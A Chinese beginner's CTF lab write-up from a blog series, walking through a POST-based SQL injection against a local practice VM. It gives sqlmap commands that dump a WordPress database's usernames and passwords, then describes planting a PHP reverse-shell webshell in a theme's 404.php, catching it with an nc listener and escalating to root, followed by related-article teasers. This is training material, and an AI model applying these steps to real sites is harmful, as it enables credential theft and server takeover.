小白学习CTF第七天-web安全sql注入(post)

最新推荐文章于 2024-08-06 11:20:47 发布
最新推荐文章于 2024-08-06 11:20:47 发布
阅读量577 收藏 1
点赞数
文章标签: 数据库 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bbhh1139/article/details/105600969
版权

post参数注入

sql注入介绍

在这里插入图片描述

信息探测

在这里插入图片描述
在这里插入图片描述
针对一些http服务的:
在这里插入图片描述
使用nikto进行http扫描:
在这里插入图片描述
再使用dirb继续进行探测:
在这里插入图片描述
在这里插入图片描述
敏感信息的探测:
在这里插入图片描述
在这里插入图片描述

漏洞扫描

使用owasp-zap
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
探测完之后,没有高危漏洞。

漏洞利用

sqlmap -r request.raw --level 5 --risk 3 --dbs --dbms mysql --batch
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 --tables --dbms mysql --batch
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 -T users --columns --dbms mysql --batch
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 -T users -C username,password --dump --dbms mysql --batch

在这里插入图片描述
在使用burpsuite进行有关探测,得到request.raw文件。
在这里插入图片描述
在这里插入图片描述
浏览器进行有关的设置:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
设置完毕。准备进行反弹raw文件
在这里插入图片描述
进行设置一下端口。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
得到了raw文件,复制到桌面上,为以后的sqlmap做准备文件。
在这里插入图片描述

sqlmap进行破解

sqlmap -r request.raw --level 5 --risk 3 --dbs --dbms mysql --batch
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 --tables --dbms mysql --batch
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 -T users --columns --dbms mysql --batch
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 -T users -C username,password --dump --dbms mysql --batch

在这里插入图片描述
得到了所有的数据库。
在这里插入图片描述
在这里插入图片描述
使用wordpress8080得到该数据库中的表。
在这里插入图片描述
得到user表中有的列名以及相关类型。
在这里插入图片描述
得到了用户名以及密码。

上传webshell获取控制权限

使用自带的php文件,修改相对应的参数,上传webshell获取控制权限。
在这里插入图片描述
在这里插入图片描述
修改完之后保存,之后全部复制下来,准备进行上传。
知道了用户名以及密码之后登陆这个网站。

http://192.168.56.102:8080/wordpress/wp-login.php

在这里插入图片描述
找到对应的404.
在这里插入图片描述
在这里插入图片描述
上传完毕完毕,终端准备进行监听。

nc -nlvp 4444

在这里插入图片描述
浏览器登陆有关网址。

http://192.168.56.102:8080/wordpress/wp-content/themes/twentythirteen/404.php

执行webshell,监听才可以起作用。
在这里插入图片描述
监听之返回对应的权限了。
使用 su - 进行提权到root。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
完毕!!!

总结

在这里插入图片描述

bbhh1139
关注
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
[网络安全自学篇] 八十.WHUCTFWEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成的WEB类型题目的解题过程,希望对您有所帮助。本来感觉能做出6道题目,但有两道题卡在某个点,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
CTF练习:SQL注入post参数http报文注入
qq_43233085的博客
11-25 2540
CTF练习:SQL注入post参数http报文注入环境准备信息收集http报文获取sqlmap注入上传shell脚本进入靶机 靶机地址: 链接: https://pan.baidu.com/s/1zNyLqsxhYxAsl77tTI6agA 提取码: 56kj 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.75....
CTF-SQL注入POST
su__xiaoyan的博客
12-23 1611
实验环境: 攻击者:Kali Linux(192.168.0.10) 靶机:Oracle VM VirtualBox 6.1.10——Ubuntu(32-bit)(192.168.0.250) 实验流程: 信息探测 检测与靶机的网络连通性 端口扫描,服务探测 详细信息扫描 命令:nmap -A -v -T4 192.168.0.250 对80端口的web服务进行目录扫描 通过目录扫描发现一个phpmyadmin和登录页面login.php 登录页面没有验证码和防爆破机制,可以进行暴力破解。登录
NSSCTF练习记录:POST注入
最新发布
qq_44396970的博客
08-06 367
用hackbar的POST传参。
webgote的例子(3)Sql注入(SearchPOST)
时光凉春衫薄的博客
03-25 529
Sql注入(Search/POST) (本章内容):post的方式进行注入 今天来讲一下sql注入的另一个例子(post) 上一个用的是get请求的方法将我们的参数传到服务器进行执行   上图中的标红是需要注意的地方。我们查询的参数都是可以通过url进行传递的title=什么就代表我们查什么。   然而post这个例子中设计者改变了这种方法选择了另外的提交方式。这时候我们在url中注入...
CTF-11.SQL注入post
woo233的博客
09-20 955
SQL注入攻击指用用户构建特殊的输入作为参数传入Web应用程序,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中,POST传递的参数;只要是用户可以输入的位置都是有可能存在注入点的;漏洞扫描器的扫描结果也不一定正确。
详解 CTF Web 中的快速反弹 POST 请求
小水池
08-11 8598
目录 0x00 前言 0x01 Python Requests 安装并导入 requests 模块 发送 GET 请求与 POST 请求 查看请求头 查看响应头 查看响应内容 传递 GET 请求参数 传递 POST 请求参数 传递 Cookie 参数 会话对象 Session() 0x02 writeups 【实验吧 CTFWeb —— 天下武功唯快不破 【Bugk...
BugkuCTF-WEB-第43题到第52题
Alita_lxz的博客
11-04 1190
BugkuCTF-WEB-第43题到第52题
[网络安全自学篇] 四.实验吧CTF实战之WEB渗透和隐写术解密
杨秀璋的专栏
08-06 1万+
上一篇文章分享了解BurpSuite工具的安装配置、Proxy基础用法,并分享一个简单的暴库案例;本篇文章分享实验吧CFT实战的题目,涉及WEB渗透和隐写术常见题型,包括“这是什么”、“天网管理系统”、“忘记密码”、“false”、“天下武功唯快不破”和“隐写术之水果、小苹果”。非常有意思的文章,作为在线笔记,希望对入门的博友们有帮助,大神请飘过,谢谢各位看官!
CTF Web学习(二)----代码审计、burp suite应用
网络猿的博客
01-10 1233
CTF Web学习(二) 代码审计、burp suite应用 CTF Web学习目录链接 CTF Web学习(一):基础篇及头文件修改、隐藏 CTF Web学习(二):代码审计、burp suite应用 文章目录CTF Web学习(二)前言一、BugKu Web题(一)BugKu Web5 矛盾(二)BugKu Web8 文件包含(三)BugKu Web9 flag In the variable !(四)BugKu Web11 网站被黑了 黑客会不会留下后门(五)BugKu Web12 本地管理员(六
CTF训练 web安全SQL注入(post)
梁辰兴的博客
10-24 1088
SQL注入攻击指的是用用户构建特殊的输入作为参数传入Web应用程序,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致的过滤用户输入的数据,致使非法数据入侵系统。任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中,POST传递的参数。只要是用户可以输入的位置都是有可能存在注入点的;漏洞扫描器的扫描结果也不一定正确。
CTF-WebPost
Zhang_hongchao的博客
01-25 983
题目:打开网址后显示以下内容: $what=$_POST['what']; echo $what; if($what=='flag') echo 'flag{****}'; 使用POST请求可以直接获取flag。 python代码: payload=dict(what='flag') r=requests.post('http://114.67.246.176:16179',data=payload) print(r.text) 可以直接获取flag为 flagflag{13c5f0c1a1a2.
CTFweb篇——GET&POST
热门推荐
suiyideAli的博客
09-21 2万+
0x00 前言 1. 首先使用BurpSuite 抓取一个http文件进行分析 2. 左边为请求信息,右边为响应信息;请求信息有三部分组成,分别为请求行、请求头、和请求正文组成。响应信息也有三部分组成,分别为响应行、响应 头、响应正文。 3. 首先可以看一下请求行 GET /index.php?tn=monline_3_dg HTTP/1.1 GET方法。GET方法用于获...
CTF-web基础$_POST
三天不打上房揭瓦的博客
08-15 2077
前言:小编也是现学现卖,方便自己记忆,写的不好的地方多多包涵,希望各位大佬多多批评指正。 网址:web基础$_POST 1.进入网址可以看到如下代码。 2.分析该代码,得出只需要传 what参数等于flag即可得出答案。即和GET代码原理一样。 $what=$_POST['what']; echo $what; if($what=='flag') echo 'flag{****}'; 3.这里使用一个小插件来通过此关。hackber 火狐浏览器可以添加的插件,通过hackber来获取到 flag,最终答
CTFweb篇-SQL注入(四)
weixin_44597701的博客
08-17 466
Less11 这一关主要就是改post请求,用post请求的参数来进行注入 填写admin登陆后仍然没有get参数 考虑就是post请求 这里就用burp suite抓包 这里就是post传入的参数值,改的就是这个值 我们把这个值拿到hackbar里面来进行操作 我们传入uname=admin’,系统会报错 right syntax to use near 'admin' LIMIT 0,1' at line 1 我们再传uname=admin",就没有报错了 证明这里是双单引号包裹 于是传入uname
ctfSQL注入post
YkingH的博客
07-07 1117
ctfSQL注入postSQL注入漏洞介绍 ​ sql注入攻击指用用户构建特殊的输入作为参数传入web应用程序,通过执行sql语句,而执行攻击者所要的操作,主要原因是程序没有细致的过滤用户输入的数据,致使非法数据侵入系统。 ​ 任何一个用户可以输入的位置都可以是注入点。比如url中,以及http报文中,post传递的参数 1.信息探测 扫描主机开放的全部端口 nmap -T4 -p -靶场IP 快速扫描主机全部信息 nmap -T4 -A -v 靶场IP 探测敏感信息 nikto -host ht
CTFHUB POST
山兔的博客
09-12 812
一、POST 这次是发一个HTTP POST请求。对了.ssrf是用php的curl实现的,并且会跟踪302跳转.加油吧骚年。 1.什么是gopher协议 Gopher是Internet上一个信息查找系统,它将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具。使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它;gopher协议支持发出GET、POST请求
Bugku CTF-web4 POST型传参
weixin_44023403的博客
04-18 3749
前言:最近开始接触bugku,感觉适合新人培养兴趣。自己在学习的时候写个笔记,督促自己多去学习和巩固知识。如果文章和代码有表述不当之处,还请大佬不吝赐教。 Bugku CTF-web4 POST型传参知识积累解题总结 知识积累 HTTP的POST请求:向指定的资源提交要被处理的数据。 HTTP的POST请求方式:把提交的数据放在HTTP包的Body中。 解题 查看PHP代码,发现可用POST类型的HTTP来请求参数,构造报文头来传参 $what=$_POSTI'what'];//读取参数what
mysql与SQL注入CTF Web安全探索关键信息库
本文档主要探讨了MySQL与SQL注入Web安全CTF(Capture The Flag,网络安全竞赛)中的重要性,结合了对系统库的深入解析以及常用指令的操作。首先,我们来了解一下MySQL的核心组成部分和它们的功能: 1. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值